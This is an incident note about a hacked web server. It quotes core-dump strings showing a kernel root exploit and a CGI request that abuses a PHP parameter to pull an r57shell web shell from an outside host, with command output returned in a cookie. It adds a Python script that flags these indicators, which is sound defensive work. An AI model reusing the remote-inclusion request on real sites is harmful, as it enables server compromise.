[Note to self from Paul: this is a real attachment from eddie, ignore the false-positive on it in liquidweb's diagnostics.]

While looking into this I noticed that someone had run a root exploit against the kernel on the server. The following is an excerpt from `strings /etc/cron.d/core.20864 |less`:

```
C) Julien TINNES
[+] Installed signal handler
[+] We are suidsafe dumpable!
[+] Malicious string forged
i686
./solpot
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {39007D2D-B089-C9D9-BF80-7D63A48A14EC})
HTTP_HOST=www.eddie-studios.com
SERVER_PORT=80
DOCUMENT_ROOT=/home/eddie/public_html
SCRIPT_FILENAME=/home/eddie/public_html/directory/search.php
REQUEST_URI=/directory/search.php?admindir=http://rst.void.ru/download/r57shell.txt?
SCRIPT_NAME=/directory/search.php
HTTP_CONNECTION=Keep-Alive
REMOTE_PORT=50888
PATH=/usr/local/bin:/usr/bin:/bin
SERVER_ADMIN=webmaster@eddie-studios.com
PWD=/dev/shm
HTTP_ACCEPT_LANGUAGE=pt-br
HTTP_REFERER=http://www.eddie-studios.com/directory/search.php?admindir=http://rst.void.ru/download/r57shell.txt?
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
REMOTE_ADDR=201.3.33.228
SERVER_NAME=www.eddie-studios.com
SHLVL=2
CONTENT_LENGTH=136
SERVER_SOFTWARE=Apache/1.3.36 (Unix) mod_jk/1.2.14 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.27 OpenSSL/0.9.7a PHP-CGI/0.1b
QUERY_STRING=admindir=http://rst.void.ru/download/r57shell.txt?
SERVER_ADDR=64.118.84.6
GATEWAY_INTERFACE=CGI/1.1
SERVER_PROTOCOL=HTTP/1.1
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_CACHE_CONTROL=no-cache
CONTENT_TYPE=application/x-www-form-urlencoded
HTTP_COOKIE=uname=Linux+drive4.mywwwserver.com+2.6.9-34.EL+%231+Wed+Mar+8+00%3A07%3A35+CST+2006+i686+i686+i386+GNU%2FLinux; id=uid%3D32087%28eddie%29+gid%3D32088%28eddie%29+groups%3D32088%28eddie%29; sysctl=-; hotlog=1
REQUEST_METHOD=POST
_=./solpot
./solpot
```

You can see that the php exploit used is still vulnerable and should be taken care of ASAP.
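
An added example, not part of the original note: triage logic for a CGI environment recovered from a core file, flagging the three things visible in the excerpt above (a query parameter whose value is a remote URL, a working directory in shared scratch space, and command output carried in a cookie). It assumes `strings` output with one string per line; the sample input is constructed with a placeholder host and address, and `parse_env` and `triage` are names chosen here.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Constructed sample shaped like the excerpt above; host and address are placeholders.
SAMPLE = """\
[+] Installed signal handler
SCRIPT_NAME=/directory/search.php
QUERY_STRING=admindir=http://attacker.example/shell.txt?
PWD=/dev/shm
REMOTE_ADDR=192.0.2.10
HTTP_COOKIE=uname=Linux+host+2.6.9; id=uid%3D32087%28eddie%29; hotlog=1
"""

ENV_LINE = re.compile(r"^([A-Z_][A-Z0-9_]*)=(.*)$")   # NAME=value, as in a process environment
REMOTE_SCHEME = re.compile(r"^(?:https?|ftp)://", re.I)
SCRATCH_DIRS = ("/dev/shm", "/tmp", "/var/tmp")       # world-writable locations
ID_OUTPUT = re.compile(r"uid=\d+\(")                  # shape of id(1) output


def parse_env(text):
    """Collect NAME=value strings from strings(1) output, skipping everything else."""
    env = {}
    for line in text.splitlines():
        m = ENV_LINE.match(line.strip())
        if m:
            env.setdefault(m.group(1), m.group(2))    # keep the first occurrence
    return env


def triage(env):
    """Return (indicator, detail) findings for one recovered CGI environment."""
    findings = []
    script = env.get("SCRIPT_NAME", "?")
    for name, value in parse_qsl(env.get("QUERY_STRING", ""), keep_blank_values=True):
        if REMOTE_SCHEME.match(value):                # parameter points at a remote resource
            findings.append(("remote-include-param", f"{script} {name}={value}"))
    pwd = env.get("PWD", "")
    if any(pwd == d or pwd.startswith(d + "/") for d in SCRATCH_DIRS):
        findings.append(("scratch-dir-cwd", pwd))
    if ID_OUTPUT.search(unquote_plus(env.get("HTTP_COOKIE", ""))):
        findings.append(("command-output-in-cookie", "id(1) output in HTTP_COOKIE"))
    return findings


if __name__ == "__main__":
    for indicator, detail in triage(parse_env(SAMPLE)):
        print(f"{indicator}: {detail}")
```

The `SCRIPT_NAME` and parameter name in a `remote-include-param` finding identify the script and input that need fixing, and the same parameter name can be searched for in the web server's access logs.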